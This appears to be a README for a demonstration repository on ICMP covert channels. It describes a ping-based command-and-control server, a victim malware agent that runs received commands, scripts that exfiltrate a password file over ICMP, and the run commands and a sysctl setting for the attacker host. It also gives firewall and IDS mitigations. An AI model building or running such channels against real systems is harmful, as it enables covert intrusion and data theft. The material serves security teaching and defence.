This project demonstrates two key attack techniques using ICMP (ping) packets:
- ICMP Reverse Shell-like Command & Control (C2)
- ICMP Data Exfiltration (One-Way)
.
├── c2server.py # Attacker C2 server (multi-command ICMP Echo Reply)
├── password.txt # Sample data to exfiltrate
├── Readme.md # This documentation
├── recieve.py # Attacker ICMP sniffer for one-way exfil
├── send.py # Victim script for one-way exfil (password.txt over ICMP)
├── victim_icmp_malware.py # Victim agent for full C2 with interactive command execution
| Component | Function |
|---|---|
send.py |
Exfiltrates contents of password.txt to attacker via ICMP Echo Request |
recieve.py |
Listens for and extracts ICMP payloads (one-way exfil capture) |
c2server.py |
Sends predefined commands in ICMP Echo Replies (multi-command C2) |
victim_icmp_malware.py |
Fully interactive malware: sends beacon, receives command, executes, replies |
IMPORTANT: make sure you run this on the C2 server: sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
This will allow you to capture ICMP traffic from the victim, and reply without the kernel replying for you.
python3 recieve.pypython3 send.py✅ Result: The content of password.txt is printed on the attacker side.
python3 c2server.py- Sends commands like
whoami,ls -al, etc.
python3 victim_icmp_malware.py- Sends periodic beacons.
- Receives and executes commands, sends output via ICMP.
- The victim sends ICMP Echo Requests with beacon or exfil data.
- The attacker replies with ICMP Echo Replies containing commands.
- The victim executes and sends back results in the next Echo Request.
✅ Outbound ICMP is often allowed.
✅ Inbound Echo Replies are often not blocked by firewalls.
✅ No TCP/UDP ports needed.
- Limit or block outbound ICMP from workstations.
- Monitor for ICMP with non-standard payloads.
- Use NIDS (e.g., Suricata, Zeek) with ICMP inspection enabled.
This repository is for educational and authorized research purposes only.
Do not use it on systems or networks without explicit permission.
Misuse may be illegal.